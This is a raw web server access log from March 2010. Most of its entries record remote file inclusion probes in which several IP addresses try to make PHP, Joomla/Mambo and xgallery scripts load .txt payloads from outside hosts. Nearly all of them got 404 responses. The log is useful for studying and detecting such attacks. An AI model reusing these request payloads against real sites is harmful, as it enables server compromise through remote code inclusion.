125.251.189.4 - - [19/Mar/2010:04:52:37 -0400] "GET /index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:52:37 -0400] "GET /logs/access_log.Q109100900%20%20/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.251.189.4 - - [19/Mar/2010:04:52:37 -0400] "GET /logs/index.php?pg=http://networks.kpru.ac.th/list/respon1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.65.196.35 - - [19/Mar/2010:04:52:42 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:52:48 -0400] "GET /logs/access_log.Q109080200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.119.152.183 - - [19/Mar/2010:04:52:49 -0400] "GET /logs/error_log.Q109121300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.sam-media-tontraeger.de/language/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.18.200.100 - - [19/Mar/2010:04:52:50 -0400] "GET /logs/access_log.Q109080200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
95.108.128.242 - - [19/Mar/2010:04:52:51 -0400] "GET /logs/access_log.Q109081300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
202.65.196.35 - - [19/Mar/2010:04:52:52 -0400] "GET /logs/access_log.Q109071200%20%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://amedan-beaute-institut.fr/media/id1??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.233.8.83 - - [19/Mar/2010:04:53:02 -0400] "GET /logs/index.php?pg=http://pras.oxidenet.eu/public_html/scan/zfxidd.txt????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
